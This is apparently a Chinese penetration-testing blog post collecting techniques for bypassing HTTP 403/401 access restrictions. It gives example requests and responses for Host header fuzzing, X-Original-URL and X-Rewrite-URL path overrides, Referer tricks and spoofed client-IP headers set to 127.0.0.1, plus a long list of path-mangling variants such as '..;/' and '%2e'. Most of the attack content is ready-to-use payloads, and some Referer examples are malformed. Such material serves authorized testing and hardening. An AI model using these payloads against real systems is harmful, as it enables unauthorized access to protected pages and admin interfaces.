0x01 前言

做滲透時經(jīng)常會碰到掃到的資產(chǎn)403的情況，特別是資產(chǎn)微乎其微的情況下，面試有時也會問到，這里做個總結！

0x02 利用姿勢

1.端口利用

掃描主機端口，找其它開放web服務的端口，訪問其端口，挑軟柿子。

2.修改HOST

Host在請求頭中的作用：在一般情況下，幾個網(wǎng)站可能會部署在同一個服務器上，或者幾個web系統(tǒng)共享一個服務器，通過host頭來指定應該由哪個網(wǎng)站或者web系統(tǒng)來處理用戶的請求。而很多WEB應用通過獲取HTTP HOST頭來獲得當前請求訪問的位置，但是很多開發(fā)人員并未意識到HTTP HOST頭由用戶控制，從安全角度來講，任何用戶輸入都是認為不安全的。

修改客戶端請求頭中的Host可以通過修改Host值修改為子域名或者ip來繞過來進行繞過二級域名；首先對該目標域名進行子域名收集，整理好子域名資產(chǎn)（host字段同樣支持IP地址）。先Fuzz測試跑一遍收集到的子域名，這里使用的是Burp的Intruder功能。若看到一個服務端返回200的狀態(tài)碼，即表面成功找到一個在HOST白名單中的子域名。我們利用firefox插件來修改HOST值，成功繞過訪問限制。

3.覆蓋請求URL

嘗試使用X-Original-URL和X-Rewrite-URL標頭繞過Web服務器的限制。通過支持X-Original-URL和X-Rewrite-URL標頭，用戶可以使用這倆請求標頭覆蓋請求URL中的路徑，嘗試繞過對更高級別的緩存和Web服務器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

或者：

Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK

4.Referer標頭繞過

嘗試使用Referer標頭繞過Web服務器的限制。

介紹：Referer請求頭包含了當前請求頁面的來源頁面的地址，即表示當前頁面是通過此來源頁面里的鏈接進入的。服務端一般使用Referer請求頭識別訪問來源。

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK

或者

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK

5.代理IP

一般開發(fā)者會通過Nginx代理識別訪問端IP限制對接口的訪問，嘗試使用X-Forwarded-For、X-Forwared-Host等標頭繞過Web服務器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

如：

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK

6.擴展名繞過

基于擴展名，用于繞過403受限制的目錄。

site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin/* => 200 site.com/admin/*/ => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin?? => 200 site.com/admin??? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200